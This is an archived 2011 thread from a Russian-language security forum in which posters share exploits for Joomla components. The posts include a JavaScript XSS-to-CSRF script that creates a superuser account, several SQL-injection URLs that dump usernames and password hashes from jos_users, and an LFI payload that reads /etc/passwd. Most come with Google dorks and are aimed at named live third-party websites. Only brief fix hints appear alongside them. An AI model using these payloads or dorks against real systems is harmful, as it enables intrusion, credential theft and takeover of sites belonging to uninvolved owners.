ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

12.07.2011, 11:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 9121
Репутация:
1
|
|
Joomla 1.6.3 CSRF Exploit
Код:
Code:
This vulnerability takes advantage of the recent Joomla 1.6.3 XSS vulnerability ( http://seclists.org/fulldisclosure/2011/Jun/519 ) to execute a CSRF vulnerability to create a superuser account.
/*
joom163.js
Joomla 1.6.3 XSS -> CSRF Exploit
Greetz to Shardy, Xires & Stacy, Rage, coorslitedude, Nothingness, MaXe
Coded By: Connection
Vuln Link: index.php?option=com_contact&view=category&catid=26&id=36&Itemid=-1";'>">
*/
document.writeln('');
function read()
{
var name="Test";
var username="haxx";
var password="test123";
var email="fake _at_ gmail.com";
document.getElementById("iframe").contentDocument.forms[0].jform_name.value = name;
document.getElementById("iframe").contentDocument.forms[0].jform_username.value = username;
document.getElementById("iframe").contentDocument.forms[0].jform_password.value = password;
document.getElementById("iframe").contentDocument.forms[0].jform_password2.value = password;
document.getElementById("iframe").contentDocument.forms[0].jform_email.value = email;
document.getElementById("iframe").contentDocument.forms[0].getElementById("1group_8").checked=true;
document.getElementById("iframe").contentDocument.getElementsByTagName("a")[11].onclick();
}
|
|
|
|

18.07.2011, 16:35
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме: 168709
Репутация:
1
|
|
Joomla com_yvhotels SQL-inj Vuln
# Exploit Title: Joomla com_yvhotels SQL-inj Vuln
# Date: 18.07.2011
# Author: z0mbyak
# Vendor or Software Link: http://joomlaforum.ru/index.php/topic,49006.0.html
# Version: 1.1.1
# Category: [remote, webapps.]
# Google dork: inurl:"index.php?option=com_yvhotels"
# Tested in: web
Code:
Сообщение от None
function show_info( $task ) {
$id = mosGetParam($_REQUEST, 'id');
switch($task) {
case 'desc':
show_hotel_desc( $id );
break;
case 'facils':
show_hotel_facils( $id );
break;
case 'rooms':
show_hotel_rooms( $id );
break;
case 'address':
show_hotel_address( $id );
break;
}
}
function show_hotel_desc( $id ) {
global $database;
$database->setQuery( "SELECT * FROM #__yvhotels WHERE id=$id");
$rows = $database->loadObjectList();
if ($database->getErrorNum()) {
echo $database->stderr();
return false;
}
$row = $rows[0];
HTML_yvhotels_front::show_hotel_desc( $row );
}
SQL-Inj Vulnerability:
exploit: null+union+all+select+1,2,3,4,user(),6,7,8,9,10,11 ,12,database(),version(),15,16,17,18,19,20,21--
VulnSite:
http://www.avalon-travel.ru/index.php?option=com_yvhotels&act=show_info&task=d esc&id=null+union+all+select+1,2,3,4,user%28%29,6, 7,8,9,10,11,12,database%28%29,version%28%29,15,16, 17,18,19,20,21--
Специально для forum.antichat.ru и rdot.org/forum/
z0mbyak.
|
|
|

22.07.2011, 12:33
|
|
Guest
Сообщений: n/a
Провел на форуме: 9121
Репутация:
1
|
|
Joomla Component mod_spo SQL Injection Vulnerability
# Exploit Title: Simple Page Option LFI
# Google Dork: inurl:mod_spo
# Date: 15/07/2011
# Author: SeguridadBlanca.Blogspot.com or SeguridadBlanca
# Software Link: http://joomlacode.org/gf/download/frsrelease/11841/47776/mod_spo_1.5.16.zip
# Version: 1.5.x
# Tested on: Backtrack and Windows 7
Simple Page Option – LFI
Vulnerable-Code:
$s_lang
=& JRequest::getVar('spo_site_lang');
(file_exists(dirname(__FILE__).DS.'languages'.DS.$ s_lang.'.php'))
? include(dirname(__FILE__).DS.'languages'.DS.$s_lan g.'.php')
: include(dirname(__FILE__).DS.'languages'.DS.'engli sh.php');
Vulnerable-Var:
spo_site_lang=
Expl0iting:
http://www.xxx.com/home/modules/mod_spo/email_sender.php?also_email_to=sample@email.tst
/* */
&spo_f_email[0]=sample@email.tst
/* */
&spo_message=20&spo_msg_ftr=This%20contact%20messa ge%20was%20generated%20using[/CODE]
%20Simple%20Page%20Options%20Module%20from%20SITEU RL.&spo_send_type=&spo_site_lang=../../../../../../../../../../etc/passwd% 00&spo_site_name=Alfredo%20Arauz&spo_url_type=1&sp o_url2se
Reparing?:
Just Filter with str_replace(); or htaccess protection to the vulnerable file.
gr33tz: Alfredo Arauz, SeguridadBlanca.Blogspot.com, Ecuador and Perú Security.
|
|
|
|

27.07.2011, 00:27
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме: 168709
Репутация:
1
|
|
Joomla com_hitexam SQL-Inj
Что?? Моя любимая тема на второй позиции??? Не порядок)
Дата: 26,07,2011 16:00
Продукт: Joomla component com_hitexam, скачать _http://www.jomexperts.com/download/doc_details/5-hitexam.html?tmpl=component
Уязвимость: SQL-Inj
Автор: z0mbyak
Тип: удалённая
Опасность: 7 (так как это не прямая заливка и возможность закрыться сторонними фильтрами, например sweb)
Описание: Уязвимость существует из-за недостаточной фильтрации входящих данных:
PHP код:
function getLevels($id){
$db = $this->getDBO();
$sql = "select l.level,l.description,l.id as l_id,s.name,s.id from #__exam_levels as l, #__exam_ques_bank as q,#__exam_subjects as s where q.lvl_id=l.id and s.id=q.sub_id and q.published=1 and q.sub_id=$id";
$db->setQuery($sql);
$results = $db->loadObjectList();
return $results;
}
Эксплоит:
_http://www.e-v-r.ru/index.php?option=com_hitexam&task=levels&id=-1+union+select+group_concat%28username,0x3a,passwo rd,0x3a,usertype%29,2,3,4,5+from+jos_users+where+u sertype=%27Super%20Administrator%27--&Itemid=66&font-size=larger
_http://www.mira15.ru/index.php?option=com_hitexam&task=levels&id=-1+union+select+group_concat%28username,0x3a,passwo rd,0x3a,usertype%29,2,3,4,5+from+jos_users+where+u sertype=%27Super%20Administrator%27--&Itemid=66&font-size=larger
dork: inurl:"index.php?option=com_hitexam"
Для устранения уязвимости, нужно просто должным образом фильтровать входящие данные)
P.S. Извини Dark, не удержался, я вообще щедрый)))
|
|
|

01.08.2011, 10:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 9121
Репутация:
1
|
|
Joomla Component (com_obSuggest) Local File Inclusion Vulnerability
[CODE]
Code:
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( )\ ))\ ) )\ ))\ ) )\ ) ( /( ( /(
)\())\()))\ ) )\()) )\ )\ )\ (()/(()/( ( (()/(()/((()/( )\()) )\())
((_)((_)\(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) )\ /(_))(_))/(_))(_)\|((_)\
__ ((_)((_)/(_))___ ((_)\ _ )\ )\___)\ _ )\(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
\ \ / / _ (_)) __\ \ / (_)_\(_)(/ __(_)_\(_) _ \| \| __| _ \ | |_ _|| \| | |/ /
\ V / (_) || (_ |\ V / / _ \ | (__ / _ \ | /| |) | _|| / |__ | | | .` | '
|
|
|
|

02.08.2011, 12:30
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме: 168709
Репутация:
1
|
|
Joomla com_adagency SQl-Inj
#Продукт: com_adagency
#Тип уязвимости: SQL-Inj
#Автор: z0mbyak
Exploit: /index.php?option=com_adagency&controller=adagencyP ackages&task=preview&tmpl=component&no_html=1&cid=-108+/*!union*/+/*!select*/+1,2,version()--
PoC:
http://www.charliesheens-korner.com/index.php?option=com_adagency&controller=adagencyP ackages&task=preview&tmpl=component&no_html=1&cid=-108+/*!union*/+/*!select*/+1,2,version%28%29--
http://joomla15.ijoomlademo.com/index.php?option=com_adagency&controller=adagencyP ackages&task=preview&tmpl=component&no_html=0&cid=-108+/*!union*/+/*!select*/+1,2,version%28%29--
Специально для forum.antichat.ru и rdot.org/forum/
|
|
|

02.08.2011, 12:53
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме: 168709
Репутация:
1
|
|
Joomla com_ag_vodmatvil SQl-Inj
#Продукт: com_ag_vodmatvil
#Тип: SQL-Inj
#Автор: z0mbyak
#exploit: /index.php?option=com_ag_vodmatvil&controller=categ ories&task=category&cid=-1+union+select+1,group_concat(username,0x3a,passwo rd,0x3a,usertype),3+from+jos_users--&Itemid=20
PoC:
http://tube.by/index.php?option=com_ag_vodmatvil&controller=categ ories&task=category&cid=-1+union+select+1,group_concat%28username,0x3a,pass word,0x3a,usertype%29,3+from+jos_users--&Itemid=20
http://vod.solo.by/index.php?option=com_ag_vodmatvil&controller=categ ories&task=category&cid=-1+union+select+1,group_concat%28username,0x3a,pass word,0x3a,usertype%29,3+from+jos_users--&Itemid=20
P.S. Вот, блин, мне делать нефиг)
Специально для forum.antichat.ru и rdot.org/forum/
|
|
|

04.08.2011, 09:11
|
|
Guest
Сообщений: n/a
Провел на форуме: 9121
Репутация:
1
|
|
Joomla Component (com_jdirectory) SQL Injection Vulnerability
Код:
Code:
=====================================================================
.__ .__ __ .__ .___
____ ___ _________ | | ____ |__|/ |_ |__| __| _/
_/ __ \\ \/ /\____ \| | / _ \| \ __\ ______ | |/ __ |
\ ___/ > > |_( ) || | /_____/ | / /_/ |
\___ >__/\_ \| __/|____/\____/|__||__| |__\____ |
\/ \/|__| \/
Exploit-ID is the Exploit Information Disclosure
Web : exploit-id.com
e-mail : root[at]exploit-id[dot]com
#########################################
I'm Caddy-Dz, member of Exploit-Id
#########################################
======================================================================
####
# Exploit Title: Joomla Component com_jdirectory SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: inurl:/component/option,com_jdirectory
# Category:: Webapps
# Tested on: [Windows 7 Edition Intégral- French]
# Vendor: http://www.joomace.net/downloads/acesef/extensions/jdirectory-acesef
####
[*] ExpLo!T :
http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0
http://www.site.com/component/option,com_jdirectory/task,show_content/contentid,1067/catid,26/directory,1/Itemid,0 # Inject Here
####
[+] Peace From Algeria
####
=================================**Algerians Hackers**=======================================|
# Greets To : |
KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T , |
All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com) |
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
RmZ ...others |
============================================================================================ |
|
|
|
|

10.08.2011, 08:45
|
|
Guest
Сообщений: n/a
Провел на форуме: 9121
Репутация:
1
|
|
[B][COLOR="DarkGreen"][SIZE="2"]TNR Enhanced Joomla Search
|
|
|
|

11.08.2011, 17:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 4100
Репутация:
74
|
|
Joomla Fastball component[SQL Injection]
Dork : inurl:"option=com_fastball"
About 1,370,000 results
exploit:
Код:
Code:
http://j15/index.php?option=com_fastball&league=123+union+select+1,2,concat_ws(0x3a,username,passw ord),4,5,6,7,8,9,10,11+from+jos_users--
Веселитесь...
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|